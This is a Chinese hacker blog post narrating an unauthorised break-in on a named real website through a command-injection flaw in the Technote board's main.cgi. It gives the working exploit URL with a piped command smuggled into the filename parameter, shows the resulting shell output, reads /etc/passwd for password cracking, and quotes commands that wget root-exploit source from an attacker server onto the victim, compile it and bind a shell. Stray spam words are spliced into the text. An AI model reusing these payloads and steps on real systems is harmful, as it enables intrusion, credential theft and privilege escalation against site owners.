web漏洞入侵提权到root的全部过程

作者：cnbird



大家好，我是cnbird，我又回来了，好长时间没有写文章了，今天手痒痒，



所以就写了一篇，希望对与unix的初学者有帮助.欢迎大家和我讨论技术。



最近在家研究perl和UNIX服务器的安装和应用，所以很长时间没有进行渗透了，在学perl和UNIX的话就要傻了，什么也不会了，所以去各大黑客站点



转转吧，来到了www.n单机传奇ocus.net看看吧，有没有什么新的公告啊，Technote’main.cgi’远程任意命令执行漏洞这个漏洞引起了我的注意，大致看了看，



知道了这是一个可以远程执行命令的漏洞，下面把漏洞的信息公布一下，Technote是韩国的Technote公司开发的公告牌系统。



Technote的’main.cgi’没有充分过滤用户提交输入，远程攻击者可以利用这



个漏洞以WEB进程权限在系统上执行任意命令。



由于不正确过滤’filename’参数，攻击者提交包含"|command"的数据作为参



数内容，可能以WEB进程权限在系统上执行任意命令。





给出利用方法



_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id">http://[target]/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id|



   看了看利用方法觉得很简单，所以打算自己写一个perl的漏洞利用程序，



看了半天，终于完成了，自己perl新学的原因，所以写的比较简陋，还要自己



修改路径，很麻烦，我就不公布了，省的高手见笑。其实这个漏洞成功率还是



很高的，基本上90%以上吧，对于咱们这些经常搞入侵之旅吧,这篇文章看着很简单，其实融合我多年



的经验（其实就1-2年）,首先要测试这个漏洞，先要找这样的论坛，



google.com就是方便，一下子找到了一大堆，好了随便挑一个进行测试吧，哈哈哈就拿你开口吧。



http://www.sealia.com/cgi-bin/technote/main.cgi首先大致看了看，然后就开始吧，



按照绿盟给出的公告测试一下，输入_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id">http://www.sealia.com/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id|



结果1



 





大家看到结果了



uid=99(nobody)gid=99(nobody)groups=99(nobody)



下面就开始利用我自己写的程序来完成工作了，毕竟在IE里面输太麻烦了，

我程序的工作界面。2



 





依次输入IP和端口，就可以直接运行程序了，输入id呵呵，和IE里面基本上差不多.



3



 





呵呵到这里我想大家的思路就是上传一个webshell然后在webshell里面搞了，



其实我也有这样的想法，可是我已经习惯了UNIX的命令行模式了，虽然能写一个webshell，但是我并没有这样做，我的目的是拿到root权限，大家一定问了，你连主机都没有连上呢，你怎么拿到root啊，小伙子你问的不错，奖你个梨吃，呵呵，下面我的思路就是登陆到机器上面，上面大家已经看到了，我们id命令的输出是uid=99(nobody)gid=99(nobody)groups=99(nobody)，权限还是很低的，试试能不能拿到/etc/passwd然后跑密码，然后执行[www.sealia.com]$cat/etc/passwd



不错，能拿到/etc/passwd。



4



 





   呵呵已经得到/etc/passwd了，我们用流光去跑密码吧，当然我没有指望它能跑出来，等待的时间真漫长啊，无聊，都已经5点50分了，天天晚上，哦哦不是晚上了，是早晨这个时候睡觉，然后12点起来，天天如此，哎，，苦啊。。。



   去forum.zone-h.org看看帖子吧，也许能找到什么灵感呢！无意间来到了http://forum.zone-h.org/viewtopic.php?t=1168&highlight=phpbb他们正在讨论phpbb的漏洞利用方法和代码，看看吧，虽然已经很老很老了，呵呵其实说实话，不怕各位见小，我以前问在这里问过问题，很长时间没有来了，看看他们有没有给回复啊



5



 





呵呵见笑了，真没想到他们给的答案还很全面，^_^连什么程序都给出了，老外就是实在...呵呵...



Thisonework单机传奇ine



http://rst.void.ru/download/r57phpbb2010.txt



upload,somethlikethis



./exploit.plvictimhost:port/php_root/topic_num"wget-O/var/tmp/.r.chttp://myhttpserver:port/exploit/root.c"





./exploit.plvictimhost:port/php_root/topic_num"gcc/var/tmp/.r.c-o.root"





execonvictimhotssameshit



andbindingshell



http://shellcode.org/Shellcode/Linux/shell-bind-shell.html



回答的让我很满意啊，正好就试试他们给的方法吧，其实以前我也知道这样的方法的就是没有bindingshell（就是把/bin/sh绑定到端口上）。好了说了这么多离题的话，我们还是赶紧做我们的事吧.
*
*